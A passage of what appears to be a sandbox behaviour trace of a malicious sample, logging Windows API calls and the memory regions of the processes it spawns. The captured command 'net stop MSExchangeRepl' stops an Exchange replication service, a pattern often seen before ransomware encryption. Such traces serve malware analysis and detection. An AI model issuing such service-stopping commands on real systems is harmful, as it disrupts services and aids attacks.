_wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0139.197] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0139.197] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0139.197] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0139.197] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0139.197] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0139.197] _wcsicmp (_String1="net", _String2="IF") returned 5 [0139.197] _wcsicmp (_String1="net", _String2="REM") returned -4 [0139.198] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0139.198] SetErrorMode (uMode=0x0) returned 0x0 [0139.198] SetErrorMode (uMode=0x1) returned 0x0 [0139.198] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47105d0, lpFilePart=0x45aee14 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x45aee14*="Desktop") returned 0x1d [0139.198] SetErrorMode (uMode=0x0) returned 0x1 [0139.198] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0139.198] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0139.206] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0139.206] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0139.206] GetConsoleTitleW (in: lpConsoleTitle=0x45af094, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.206] InitializeProcThreadAttributeList (in: lpAttributeList=0x45aefc0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x45aefa4 | out: lpAttributeList=0x45aefc0, lpSize=0x45aefa4) returned 1 [0139.206] UpdateProcThreadAttribute (in: lpAttributeList=0x45aefc0, dwFlags=0x0, Attribute=0x60001, lpValue=0x45aefac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x45aefc0, lpPreviousValue=0x0) returned 1 [0139.206] GetStartupInfoW (in: lpStartupInfo=0x45aeff8 | out: lpStartupInfo=0x45aeff8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.206] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0139.207] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0139.207] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0139.208] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeRepl", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x45aef48*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeRepl", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x45aef94 | out: lpCommandLine="net stop MSExchangeRepl", lpProcessInformation=0x45aef94*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc20, dwThreadId=0x1f4)) returned 1 [0139.214] CloseHandle (hObject=0xa4) returned 1 [0139.214] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0139.214] GetEnvironmentStringsW () returned 0x4719ed0* [0139.215] FreeEnvironmentStringsA (penv="=") returned 1 [0139.215] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0139.394] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x45aef2c | out: lpExitCode=0x45aef2c*=0x2) returned 1 [0139.394] CloseHandle (hObject=0xa8) returned 1 [0139.394] _vsnwprintf (in: _Buffer=0x45af014, _BufferCount=0x13, _Format="%08X", _ArgList=0x45aef34 | out: _Buffer="00000002") returned 8 [0139.394] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0139.394] GetEnvironmentStringsW () returned 0x471b3c0* [0139.394] FreeEnvironmentStringsA (penv="=") returned 1 [0139.395] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0139.395] GetEnvironmentStringsW () returned 0x471b3c0* [0139.395] FreeEnvironmentStringsA (penv="=") returned 1 [0139.395] DeleteProcThreadAttributeList (in: lpAttributeList=0x45aefc0 | out: lpAttributeList=0x45aefc0) [0139.395] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.395] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0139.395] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.395] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0139.395] _get_osfhandle (_FileHandle=0) returned 0x38 [0139.395] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0139.395] SetConsoleInputExeNameW () returned 0x1 [0139.395] GetConsoleOutputCP () returned 0x1b5 [0139.396] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0139.396] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.396] exit (_Code=2) Thread: id = 708 os_tid = 0xc24 Process: id = "238" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x14e01000" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "237" os_parent_pid = "0xc1c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11520 start_va = 0x7fbea000 end_va = 0x7fbeafff entry_point = 0x0 region_type = private name = "private_0x000000007fbea000" filename = "" Region: id = 11521 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11522 start_va = 0x2ad5ef0000 end_va = 0x2ad5f0ffff entry_point = 0x0 region_type = private name = "private_0x0000002ad5ef0000" filename = "" Region: id = 11523 start_va = 0x2ad5f10000 end_va = 0x2ad5f23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ad5f10000" filename = "" Region: id = 11524 start_va = 0x2ad5f30000 end_va = 0x2ad5f6ffff entry_point = 0x0 region_type = private name = "private_0x0000002ad5f30000" filename = "" Region: id = 11525 start_va = 0x7df5ff950000 end_va = 0x7ff5ff94ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff950000" filename = "" Region: id = 11526 start_va = 0x7ff6c47f0000 end_va = 0x7ff6c4812fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47f0000" filename = "" Region: id = 11527 start_va = 0x7ff6c481d000 end_va = 0x7ff6c481dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c481d000" filename = "" Region: id = 11528 start_va = 0x7ff6c481e000 end_va = 0x7ff6c481ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c481e000" filename = "" Region: id = 11529 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 11530 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11531 start_va = 0x2ad5ef0000 end_va = 0x2ad5efffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ad5ef0000" filename = "" Region: id = 11532 start_va = 0x2ad5f00000 end_va = 0x2ad5f06fff entry_point = 0x0 region_type = private name = "private_0x0000002ad5f00000" filename = "" Region: id = 11533 start_va = 0x2ad5f70000 end_va = 0x2ad602dfff entry_point = 0x2ad5f70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11534 start_va = 0x2ad6030000 end_va = 0x2ad6030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ad6030000" filename = "" Region: id = 11535 start_va = 0x2ad6040000 end_va = 0x2ad613ffff entry_point = 0x0 region_type = private name = "private_0x0000002ad6040000" filename = "" Region: id = 11536 start_va = 0x2ad6140000 end_va = 0x2ad617ffff entry_point = 0x0 region_type = private name = "private_0x0000002ad6140000" filename = "" Region: id = 11537 start_va = 0x2ad6180000 end_va = 0x2ad6186fff entry_point = 0x0 region_type = private name = "private_0x0000002ad6180000" filename = "" Region: id = 11538 start_va = 0x2ad6190000 end_va = 0x2ad6190fff entry_point = 0x0 region_type = private name = "private_0x0000002ad6190000" filename = "" Region: id = 11539 start_va = 0x2ad61a0000 end_va = 0x2ad61a0fff entry_point = 0x0 region_type = private name = "private_0x0000002ad61a0000" filename = "" Region: id = 11540 start_va = 0x2ad6220000 end_va = 0x2ad622ffff entry_point = 0x0 region_type = private name = "private_0x0000002ad6220000" filename = "" Region: id = 11541 start_va = 0x2ad6230000 end_va = 0x2ad63b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ad6230000" filename = "" Region: id = 11542 start_va = 0x2ad63c0000 end_va = 0x2ad6540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ad63c0000" filename = "" Region: id = 11543 start_va = 0x2ad6550000 end_va = 0x2ad794ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ad6550000" filename = "" Region: id = 11544 start_va = 0x7ff6c46f0000 end_va = 0x7ff6c47effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46f0000" filename = "" Region: id = 11545 start_va = 0x7ff6c481b000 end_va = 0x7ff6c481cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c481b000" filename = "" Region: id = 11546 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 11547 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 11548 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11549 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11550 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 11551 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11552 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11553 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11554 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11555 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11556 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11557 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 11558 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 11559 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 705 os_tid = 0xd04 Thread: id = 706 os_tid = 0xd8c Thread: id = 707 os_tid = 0xc58 Process: id = "239" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1393c000" os_pid = "0xc20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "237" os_parent_pid = "0xc1c" cmd_line = "net stop MSExchangeRepl" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11573 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 11574 start_va = 0xfe0000 end_va = 0x4fdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fe0000" filename = "" Region: id = 11575 start_va = 0x4fe0000 end_va = 0x4ffffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 11576 start_va = 0x5000000 end_va = 0x5001fff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 11577 start_va = 0x5010000 end_va = 0x5023fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005010000" filename = "" Region: id = 11578 start_va = 0x5030000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000005030000" filename = "" Region: id = 11579 start_va = 0x5070000 end_va = 0x50effff entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 11580 start_va = 0x50f0000 end_va = 0x50f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050f0000" filename = "" Region: id = 11581 start_va = 0x5100000 end_va = 0x5100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005100000" filename = "" Region: id = 11582 start_va = 0x5110000 end_va = 0x5111fff entry_point = 0x0 region_type = private name = "private_0x0000000005110000" filename = "" Region: id = 11583 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11584 start_va = 0x7f100000 end_va = 0x7f122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f100000" filename = "" Region: id = 11585 start_va = 0x7f128000 end_va = 0x7f128fff entry_point = 0x0 region_type = private name = "private_0x000000007f128000" filename = "" Region: id = 11586 start_va = 0x7f12c000 end_va = 0x7f12efff entry_point = 0x0 region_type = private name = "private_0x000000007f12c000" filename = "" Region: id = 11587 start_va = 0x7f12f000 end_va = 0x7f12ffff entry_point = 0x0 region_type = private name = "private_0x000000007f12f000" filename = "" Region: id = 11588 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11589 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11590 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11591 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11592 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11593 start_va = 0x5140000 end_va = 0x514ffff entry_point = 0x0 region_type = private name = "private_0x0000000005140000" filename = "" Region: id = 11594 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11595 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11596 start_va = 0x5290000 end_va = 0x538ffff entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 11597 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 709 os_tid = 0x1f4 Thread: id = 710 os_tid = 0xc78 Process: id = "240" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x13f37000" os_pid = "0xc68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "239" os_parent_pid = "0xc20" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeRepl" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11598 start_va = 0xe90000 end_va = 0xeaffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 11599 start_va = 0xeb0000 end_va = 0xeb1fff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 11600 start_va = 0xec0000 end_va = 0xed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 11601 start_va = 0xee0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 11602 start_va = 0xf20000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 11603 start_va = 0xfa0000 end_va = 0xfa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 11604 start_va = 0xfb0000 end_va = 0xfb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 11605 start_va = 0xfc0000 end_va = 0xfc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 11606 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 11607 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 11608 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11609 start_va = 0x7e900000 end_va = 0x7e922fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e900000" filename = "" Region: id = 11610 start_va = 0x7e92a000 end_va = 0x7e92afff entry_point = 0x0 region_type = private name = "private_0x000000007e92a000" filename = "" Region: id = 11611 start_va = 0x7e92b000 end_va = 0x7e92bfff entry_point = 0x0 region_type = private name = "private_0x000000007e92b000" filename = "" Region: id = 11612 start_va = 0x7e92d000 end_va = 0x7e92ffff entry_point = 0x0 region_type = private name = "private_0x000000007e92d000" filename = "" Region: id = 11613 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11614 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11615 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11616 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11617 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11618 start_va = 0x1060000 end_va = 0x106ffff entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 11619 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11620 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11621 start_va = 0x5240000 end_va = 0x533ffff entry_point = 0x0 region_type = private name = "private_0x0000000005240000" filename = "" Region: id = 11622 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11623 start_va = 0xe90000 end_va = 0xe9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 11624 start_va = 0xea0000 end_va = 0xea3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 11625 start_va = 0xfd0000 end_va = 0x100ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 11626 start_va = 0x50c0000 end_va = 0x517dfff entry_point = 0x50c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 